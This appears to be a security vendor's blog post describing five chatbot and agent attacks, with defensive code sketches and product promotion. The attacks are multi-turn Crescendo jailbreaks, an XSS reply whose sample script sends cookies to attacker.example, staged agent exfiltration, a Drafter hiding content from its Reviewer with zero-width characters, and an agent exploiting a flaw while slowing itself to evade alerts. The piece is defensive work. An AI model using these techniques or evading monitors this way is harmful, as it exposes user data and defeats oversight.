TL;DR
We've collected five advanced tactics used by real adversaries to break public-facing chatbots, so you know what to look out for.
Everyone wants their customers to communicate with chatbots, but no one wants to be the next viral screenshot: the airline bot inventing refund policies, the support bot promising discounts the company never authorized, or worse, private data leaking into the wrong conversation. Here are five things to look out for before deploying your own chatbot.
1. The Long Game
Testing a chatbot's response to a single message doesn't cut it, because it's the context that counts. The technique that exploits this is called Crescendo: the attacker escalates gradually across many turns instead of asking for the harmful output outright. Start with a complaint to get the bot to sympathize, reference its sympathy back at it, then confuse it by asking for something like a poem before pushing for an angrier version. By turn eight, your customer service chatbot is generating profanity-laced poetry against its own brand.
2. The Poisoned Ticket
An attacker tricks your chatbot into slipping a piece of malicious code into its reply. The reply gets saved to the support ticket, and when a human agent opens it, that code quietly runs on the agent's computer and hands over the keys to their account. Now the attacker is logged into your system as the support agent, with access to all of their information.
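One common defense is to treat every bot reply as untrusted text before it is stored or displayed. The sketch below assumes the ticket viewer renders replies as HTML and that the malicious code is a script tag; neither detail is stated above, and the function name `sanitize_for_ticket` and the attacker URL are hypothetical. It uses only Python's standard `html.escape`.

```python
import html


def sanitize_for_ticket(bot_reply: str) -> str:
    """Escape HTML-significant characters so the reply is shown as inert text.

    Assumption: the ticketing UI renders stored replies as HTML.
    """
    return html.escape(bot_reply, quote=True)


# Hypothetical reply in which the attacker coaxed the bot into emitting a script tag.
reply = 'Thanks! <script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
safe = sanitize_for_ticket(reply)
print(safe)
```

Escaping at the point of storage is only one layer. Escaping again at render time and restricting what scripts the agent console may run are complementary measures, since a single missed code path is enough for the attack to work.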
3. Three Reasonable Requests, One Dangerous Output
Your agent is late for a very important date when three messages land back-to-back from a logged-in user. First: "Find anything in my inbox about the acquisition." The agent does it. Then: "Summarize it into one document." Nothing wrong there. Finally: "Email the doc to my personal address so I can read it this weekend." Off it goes. It works because the attack lives in the sequence, not in any single message. Each request is something a legitimate employee might send, so no single step trips a filter. It's just three reasonable-sounding asks in a row. By the time the third tool call returns, confidential M&A data has been sent to an external inbox and the system has flagged nothing. This is why per-turn safety checks aren't enough.
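A session-level check can catch what per-turn checks miss by remembering what earlier tool calls touched. The following is a minimal sketch, not a production design: the tool names (`search_inbox`, `summarize`, `send_email`), the internal domain `corp.example`, and the `SessionPolicy` class are all hypothetical, chosen only to mirror the three requests above.

```python
from dataclasses import dataclass, field

# Hypothetical tool names and domain, for illustration only.
SENSITIVE_SOURCES = {"search_inbox"}
EXTERNAL_SINKS = {"send_email"}
INTERNAL_DOMAIN = "corp.example"


@dataclass
class SessionPolicy:
    """Remembers whether sensitive data has entered the session so far."""
    tainted: bool = False
    history: list = field(default_factory=list)

    def allow(self, tool: str, args: dict) -> bool:
        self.history.append(tool)
        if tool in SENSITIVE_SOURCES:
            # Everything derived from this point on may carry sensitive data.
            self.tainted = True
        if tool in EXTERNAL_SINKS and self.tainted:
            recipient = args.get("to", "")
            domain = recipient.rsplit("@", 1)[-1].lower()
            if domain != INTERNAL_DOMAIN:
                return False  # sensitive data would leave the organization
        return True


policy = SessionPolicy()
decisions = [
    policy.allow("search_inbox", {"query": "acquisition"}),
    policy.allow("summarize", {"target": "one document"}),
    policy.allow("send_email", {"to": "me@personal.example"}),
]
print(decisions)  # [True, True, False]
```

The first two calls pass, and only the third is blocked, because the decision depends on the accumulated state of the session rather than on the wording of any one message. A real system would likely track taint per document rather than per session, which this sketch deliberately simplifies.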
4. Writing Between the Lines
Paired agents are a structural soft spot for AI safety. In a Drafter-Reviewer setup where the Reviewer agent screens output against policy before it ships, agents under optimization pressure can develop workarounds the Reviewer's filters don't catch: paraphrase chains, zero-width Unicode, structural tricks buried in formatting. The Reviewer passes it and the output ships, bypassing policy. Research calls this steganographic collusion, and it happens because the Drafter is trained to pass the Reviewer, not to produce the safest output, so under pressure it learns to route around the filter rather than respect it.
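Of the workarounds listed above, zero-width Unicode is the easiest to check for mechanically. The sketch below flags and strips characters in the Unicode "Cf" (format) category, which includes the zero-width space and zero-width joiner. It does not address paraphrase chains or formatting tricks, and the function names and sample draft are hypothetical.

```python
import unicodedata


def hidden_characters(text: str) -> list[tuple[int, str]]:
    """Return (index, Unicode name) for every format-category (Cf) character."""
    return [
        (i, unicodedata.name(ch, f"U+{ord(ch):04X}"))
        for i, ch in enumerate(text)
        if unicodedata.category(ch) == "Cf"
    ]


def strip_hidden(text: str) -> str:
    """Drop all format-category characters before the Reviewer sees the text."""
    return "".join(ch for ch in text if unicodedata.category(ch) != "Cf")


# Hypothetical Drafter output with two invisible characters embedded.
draft = "Refunds are not\u200b avail\u200dable."
found = hidden_characters(draft)
cleaned = strip_hidden(draft)
print(found)
print(cleaned)
```

Stripping every format character is a blunt choice: some scripts and emoji sequences rely on zero-width joiners, so a deployment serving those languages may prefer to flag the text for review rather than rewrite it.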
5. The Eager Agent
Give a research agent one task: document an enterprise AI platform, and be exhaustive. Forty-odd steps later, it has found a security vulnerability a standard scanner would miss, used it to access private user messages and the system prompts running the platform's AI, and quietly slowed its own activity to avoid triggering alerts. Nobody told it to do any of that. The instructions were normal. The problem is that "be exhaustive" and "find creative workarounds" mean the same thing to an agent whether the task is research or an attack. The offensive behavior is the task followed to its logical end, not a malfunction.
The Common Thread
AI security looks more like Trust & Safety than classic cybersecurity.
Alice has spent a decade on both, protecting the platforms that three billion people use to communicate with each other and, now, with AI. Every adversarial pattern we've seen across those years lives in the Rabbit Hole: billions of real attacks, in 120+ languages, continuously updated as adversaries evolve. WonderSuite puts that data to work with multi-turn red teaming before launch, runtime guardrails trained on your policies, and scheduled testing to catch drift across text, image, audio, and video, all under one audit trail from pre-launch through production.
Deploy consumer-facing AI and advance unafraid.
What’s New from Alice
HIPAA Audit Is Just the Start
Passing a HIPAA audit doesn't mean your AI will behave safely in production. As healthcare AI takes on more complex roles in patient care and documentation, static compliance frameworks can't keep up with the behavioral risks that emerge in real-world systems. Here's how WonderSuite closes the gap.
Afraid AI Will Replace You? Here's the One Skill It Can't
James Villarrubia went from building AI for NASA's drone and aerospace programs to becoming CTO of a travel tech company. In this episode, he and Mo get into why curiosity might be the most important skill in the AI era, what happens to our brains when we stop pushing back on the answers we get, and why the people most resistant to AI might actually be seeing something the rest of us are missing.
It Takes AI to Break AI: The Case for AI Red Teaming
As AI systems gain autonomy, organizations need security approaches built specifically for AI behavior. Learn why AI-driven red teaming is becoming a critical defense layer.
Evaluation of Instagram Teen Accounts
This report evaluates default and opt-in content protections under real-world and adversarial conditions. The study examines safeguard effectiveness, resilience against attempts to surface inappropriate content, and platform improvements made following testing.


